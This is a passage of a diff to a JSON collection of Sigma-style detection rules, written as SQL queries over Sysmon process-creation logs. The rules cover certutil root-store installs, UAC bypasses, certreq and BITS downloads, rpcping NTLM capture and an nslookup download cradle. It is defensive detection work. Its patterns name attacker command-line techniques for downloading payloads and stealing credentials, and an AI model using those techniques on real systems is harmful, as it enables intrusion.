CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "proc_creation_win_certutil_certificate_installation.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "status": "test", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.t1127" ], "falsepositives": [ - "AppvClient", - "CCM" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "title": "Conhost Parent Process Executions", + "id": "7dc2dedd-7603-461a-bc13-15803d132355", "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" - ], - "filename": "proc_creation_win_susp_parents.yml" - }, - { - "title": "New User Created Via Net.EXE", - "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "status": "test", - "description": "Identifies the creation of local users via the net.exe command.", - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "author": "omkar72", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate user creation.", - "Better use event IDs for user creation rather than command line rules." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND Image LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') 
AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_user_add.yml" + "filename": "proc_creation_win_conhost_susp_child_process.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "UAC Bypass via Windows Firewall Snap-In Hijack", + "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "author": "Tim Rauch", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE 
'\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Capture Credentials with Rpcping.exe", - "id": "93671f99-04eb-4ab4-a161-70d446a84003", - "status": "test", - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "author": "Julia Fomina, oscd.community", + "title": "Sysinternals PsService Execution", + "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "status": "experimental", + "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Unlikely" + "Legitimate use of PsService by an administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR 
CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psservice.exe' OR (Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rpcping_credential_capture.yml" + "filename": "proc_creation_win_sysinternals_psservice.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "title": "Windows Binary Executed From WSL", + "id": "ed825c86-c009-4014-b413-b76003e33d35", + "status": "experimental", + "description": "Detects the execution of Windows binaries from within a WSL instance. 
This could be used to masquerade parent-child relationships", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1202" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", - "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "title": "Monitoring For Persistence Via BITS", + "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "status": "test", + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. 
It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1197" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" }, { - "title": "Taskmgr as Parent", - "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", "status": "test", - "description": "Detects the creation of a process from Windows task manager", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - 
"attack.t1036" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\taskmgr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\resmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_taskmgr_susp_child_process.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", - "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", - "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" + "attack.execution", + "attack.persistence", + "attack.t1059" ], "falsepositives": [ - "Inventory tool runs", - "Administrative activity" + "Legitimate use by administrator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' 
ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "Imports Registry Key From a File", - "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "status": "test", - "description": "Detects the import of the specified file to the registry with regedit.exe.", - 
"author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Directory Removal Via Rmdir", + "id": "41ca393d-538c-408a-ac27-cf1e038be80c", + "status": "experimental", + "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "author": "frack113", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate import of keys", - "Evernote" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%rmdir%' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%/q%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_import_keys.yml" + "filename": "proc_creation_win_cmd_rmdir_execution.yml" }, { - "title": "File or Folder Permissions 
Modifications", - "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "status": "test", - "description": "Detects a file or folder's permissions being modified or tampered with.", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR Image LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND 
(ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_susp_file_permission_modifications.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Nslookup PowerShell Download Cradle - ProcessCreation", + "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR 
